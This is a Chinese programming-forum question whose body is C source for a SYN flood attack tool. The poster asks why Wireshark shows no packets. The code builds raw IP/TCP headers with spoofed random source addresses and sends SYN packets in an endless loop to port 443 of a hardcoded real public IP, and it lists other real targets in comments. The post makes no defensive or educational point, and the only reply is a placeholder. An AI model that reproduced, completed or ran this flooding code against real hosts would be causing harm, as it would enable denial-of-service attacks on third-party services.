Welcome to OStack Knowledge Sharing Community for programmer and developer-Open, Learning and Share
Welcome To Ask or Share your Answers For Others

Categories

0 votes
3.9k views
in Technique[技术] by (71.8m points)

为什么运行下面的SYN Flooding是攻击程序,wireshark 抓不到数据包?

include "stdafx.h"

include <winsock2.h>

include <stdio.h>

include <windows.h>

include <ws2tcpip.h>

include <stdlib.h>

pragma comment(lib,"ws2_32.lib")

define SEQ 0x28376839//ip数据包结构

//#define SYN_DEST_IP "36.152.44.96"//被攻击的IP www.baidu.com

define SYN_DEST_IP "112.25.57.102"

//#define SYN_DEST_IP "192.168.145.131"
//#define SYN_DEST_IP "202.101.244.16"
//#define SYN_DEST_IP "192.168.43.50"

//#define SYN_SOUR_IP "172.20.10.7"//源ip地址

pragma pack(push,1)

typedef struct _iphdr //定义IP首部
{

unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int  sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址

}IP_HEADER;
struct //定义TCP伪首部
{

unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;   //, 用于填充对齐
char ptcl; //协议类型
unsigned short tcpl; //TCP长度

}psd_header;
typedef struct _tcphdr //定义TCP首部
{

USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/6位保留字
unsigned char th_flag; //6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量

}TCP_HEADER;

pragma pack(pop)

//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{

unsigned long cksum = 0;
while (size >1) {
    cksum += *buffer++;
    size -= sizeof(USHORT);
}
if (size) {
    cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (USHORT)(~cksum);

}
//生成随机ip
void random_ip(char *str){

int a, b, c, d;
a = rand() % 255;
b = rand() % 255;
c = rand() % 255;
d = rand() % 255;
sprintf(str, "%d.%d.%d.%d", a, b, c, d);

}

// SynFlood主函数
int main()
{

int datasize, ErrorCode,iresult;
int flag = 1, SendSEQ = 0;
char SendBuf[500] = {0};
WSADATA wsaData;

struct sockaddr_in DestAddr;
IP_HEADER ip_header;
TCP_HEADER tcp_header;
//初始化SOCK_RAW
if ((ErrorCode = WSAStartup(MAKEWORD(2, 2), &wsaData)) != 0){

    printf("初始化失败!
");
}
int  SockRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);

if (SockRaw == INVALID_SOCKET){

    printf("创建套接字失败! 错误码 :%d
", WSAGetLastError());
}
flag = TRUE;
// 防止自动填充数据包
int opt = setsockopt(SockRaw,  IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag));
if (opt == SOCKET_ERROR){
    printf("设置 IP_HDRINCL 错误 ! 错误码 :%d
", WSAGetLastError());
}
    
    memset(&DestAddr, 0, sizeof(DestAddr));
    DestAddr.sin_family = AF_INET;
    DestAddr.sin_port = htons(443);
    DestAddr.sin_addr.S_un.S_addr = inet_addr(SYN_DEST_IP);

    while (1) {
    
        
            // 伪造ip源地址
            char  fake_ip[20];
            random_ip(fake_ip);
            int port;
            port = rand() % 65535;

            //填充IP首部
            ip_header.h_verlen = (4 << 4 | sizeof(ip_header) / sizeof(unsigned long));
            //高四位IP版本号,低四位首部长度
            ip_header.tos = 0;
            ip_header.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度(字节)
            ip_header.ident = 1; //16位标识
            ip_header.frag_and_flags = 0; //3位标志位
            ip_header.ttl = 128; //8位生存时间TTL
            ip_header.proto = IPPROTO_TCP; //8位协议(TCP,UDP…)
            ip_header.checksum = 0; //16位IP首部校验和
            ip_header.sourceIP = inet_addr("172.20.10.7");// fake_ip); //伪造32位源IP地址
            ip_header.destIP = inet_addr(SYN_DEST_IP); //32位目的IP地址
            //填充TCP首部
            tcp_header.th_sport = htons(port); //伪造源端口号
            tcp_header.th_dport = htons(443); //目的端口号
            tcp_header.th_seq = htonl(SEQ + SendSEQ); //SYN序列号
            tcp_header.th_ack = 0; //ACK序列号置为0
            tcp_header.th_lenres = (sizeof(TCP_HEADER) / 4 << 4 | 0); //TCP长度和保留位
            tcp_header.th_flag = 2; //SYN 标志
            tcp_header.th_win = htons(6384); //窗口大小
            tcp_header.th_urp = 0; //偏移
            tcp_header.th_sum = 0; //校验和
            //填充TCP伪首部(用于计算校验和,并不真正发送)
            psd_header.saddr = ip_header.sourceIP; //源地址
            psd_header.daddr = ip_header.destIP; //目的地址
            psd_header.mbz = 0;
            psd_header.ptcl = IPPROTO_TCP; //协议类型
            psd_header.tcpl = htons(sizeof(tcp_header)); //TCP首部长度



            //计算IP校验和
            memcpy(SendBuf, &psd_header, sizeof(psd_header));
            memcpy(SendBuf + sizeof(psd_header), &tcp_header, sizeof(tcp_header));
            tcp_header.th_sum = checksum((USHORT *)SendBuf, sizeof(psd_header)+sizeof(tcp_header));
            memcpy(SendBuf, &ip_header, sizeof(ip_header));
            memcpy(SendBuf + sizeof(ip_header), &tcp_header, sizeof(tcp_header));

            datasize = sizeof(ip_header)+sizeof(tcp_header);

            //发送TCP报文
            iresult = sendto(SockRaw,
                SendBuf,
                datasize+20,
                0,
                (struct sockaddr*) &DestAddr,
                sizeof(DestAddr));
            if (iresult == SOCKET_ERROR)
            {
                printf("发送失败! 错误码 :%d
", WSAGetLastError());
                break;

            }
            else
                printf("随机ip地址:%s
", fake_ip);
                printf("随机端口  :%d
", port);
                printf("缓冲区内容:%s
", SendBuf);

        
    }//End of While
    closesocket(SockRaw);
    WSACleanup();
    
return 0;

}


与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
Welcome To Ask or Share your Answers For Others

1 Answer

0 votes
by (71.8m points)
等待大神解答

与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
Welcome to OStack Knowledge Sharing Community for programmer and developer-Open, Learning and Share
Click Here to Ask a Question

...